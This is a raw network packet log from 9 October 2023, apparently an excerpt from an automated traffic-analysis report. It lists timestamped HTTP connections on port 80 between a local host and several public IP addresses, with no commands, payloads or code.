                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544936895 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.545672894 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.545706987 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.545730114 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.545742035 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.545763969 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.545783997 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.545825005 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.545860052 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.546638966 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.546677113 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.546679974 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.546711922 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.546736956 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.546770096 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.546773911 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.546799898 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.547524929 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.547569990 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.547574997 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.547616005 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.547620058 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.547631979 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.547658920 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.547683001 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.548398018 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.548438072 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.548449039 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.548477888 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.548501015 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.548533916 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.548557043 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.548589945 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.549350977 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.549362898 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.549386978 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.549407959 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.549412012 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.549422979 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.549447060 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.549463987 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.549979925 CEST804981681.2.194.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.550064087 CEST4981680192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.550213099 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.550249100 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.550252914 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.550267935 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.550280094 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.550309896 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.550309896 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.550348043 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551155090 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551194906 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551229000 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551259995 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551620960 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551654100 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551659107 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551698923 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551744938 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551774979 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551812887 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.551847935 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.552608013 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.552648067 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.552670956 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.552710056 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.552752018 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.552789927 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.552835941 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.552866936 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.554163933 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.554207087 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.554210901 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.554239035 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.554263115 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.554297924 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.554323912 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.554358006 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555217028 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555228949 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555249929 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555264950 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555274010 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555300951 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555326939 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555363894 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555875063 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555915117 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555942059 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555953026 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555977106 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.555982113 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.556010962 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.556166887 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.556205988 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.556216955 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.556247950 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.556358099 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.556391954 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.556452990 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.556493044 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.557126045 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.557157040 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.557180882 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.557219028 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.557220936 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.557250023 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.557297945 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.557329893 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558008909 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558048964 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558053017 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558083057 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558094978 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558130980 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558135033 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558167934 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558931112 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558964014 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558965921 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.558995008 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559017897 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559057951 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559061050 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559091091 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559863091 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559876919 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559896946 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559921980 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559922934 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559963942 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559966087 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.559995890 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.560884953 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.560925961 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.560937881 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.560976982 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.560982943 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561014891 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561028957 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561058998 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561352968 CEST804981746.242.238.60192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561655045 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561685085 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561690092 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561717033 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561820984 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561832905 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561855078 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.561873913 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.562385082 CEST804981746.242.238.60192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.562539101 CEST4981780192.168.2.346.242.238.60
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.562633991 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.562669039 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.562674999 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.562707901 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.562731028 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.562760115 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.562771082 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.562786102 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.563543081 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.563574076 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.604367971 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.653130054 CEST4980080192.168.2.396.91.204.114
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.658757925 CEST4982080192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.689908981 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.689929008 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.689944029 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690021992 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690094948 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690094948 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690352917 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690397978 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690567970 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690609932 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690634012 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690674067 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690697908 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690737009 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690798998 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690845013 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690866947 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690910101 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690939903 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.690982103 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.691030979 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.691071987 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.691131115 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.691169977 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.691209078 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.691253901 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.691257000 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.691289902 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.691907883 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.691956043 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.708556890 CEST4981680192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.738675117 CEST8049819202.254.236.40192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.740835905 CEST8049819202.254.236.40192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.740906000 CEST4981980192.168.2.3202.254.236.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.765036106 CEST8049818211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.765192032 CEST4981880192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.976687908 CEST8049820213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.976814032 CEST4982080192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.031765938 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.031793118 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.031805992 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.031819105 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.031872988 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.031929970 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.031933069 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.031966925 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.032002926 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.032027006 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.032066107 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.032188892 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.032221079 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.043848038 CEST4981980192.168.2.3202.254.236.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.048736095 CEST804981681.2.194.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.048794985 CEST4981680192.168.2.381.2.194.241
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.059345961 CEST4980480192.168.2.3185.15.129.58
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.134485006 CEST4982080192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.139786959 CEST4982180192.168.2.351.79.51.72
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.145649910 CEST4982280192.168.2.3142.250.217.147
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.155905962 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.317986965 CEST8049822142.250.217.147192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.318173885 CEST4982280192.168.2.3142.250.217.147
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.318929911 CEST8049823172.67.201.26192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.318972111 CEST8049819202.254.236.40192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.319040060 CEST4982380192.168.2.3172.67.201.26
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.319063902 CEST4981980192.168.2.3202.254.236.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371395111 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371412039 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371494055 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371550083 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371635914 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371638060 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371716022 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371721983 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371768951 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371790886 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371843100 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371867895 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371907949 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371949911 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.371990919 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372030973 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372071981 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372096062 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372136116 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372153997 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372195959 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372241974 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372288942 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372292042 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372334957 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372364998 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372406960 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372426987 CEST804981539.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.372467995 CEST4981580192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.374385118 CEST804982151.79.51.72192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.374475956 CEST4982180192.168.2.351.79.51.72
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.454050064 CEST8049820213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.454106092 CEST8049820213.186.33.17192.168.2.3
